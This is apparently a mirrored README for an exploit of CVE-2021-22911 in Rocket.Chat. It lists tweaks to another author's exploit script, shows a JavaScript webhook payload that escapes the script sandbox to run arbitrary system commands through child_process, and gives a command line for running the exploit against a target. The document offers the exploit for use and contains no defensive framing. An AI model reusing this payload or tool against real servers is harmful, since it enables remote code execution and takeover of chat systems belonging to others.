Share
## https://sploitus.com/exploit?id=20192387-7625-5BDB-89FD-50906A88FDBD
# CVE-2021-22911-EXP

## Info

Some small changes to the [code](https://github.com/CsEnox/CVE-2021-22911) by CsEnox:

1. Replace the `oathtool` library with the `pyotp` library.
2. Modify the format of the JavaScript script used to construct the webhook.

```javascript
class Script {
  process_incoming_request({ request }) {
const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec('your command');
  }
}
```

## Notice

1. You can check if the webhook has been executed successfully using the `wegt` command, provided that you have installed this command in the Docker container.
2. The default administrator username in the code is `admin`.

## Usage

```cmd
python exploit.py -u "user@rocket.local" -a "admin@rocket.local" -t "http://rocket.local"
```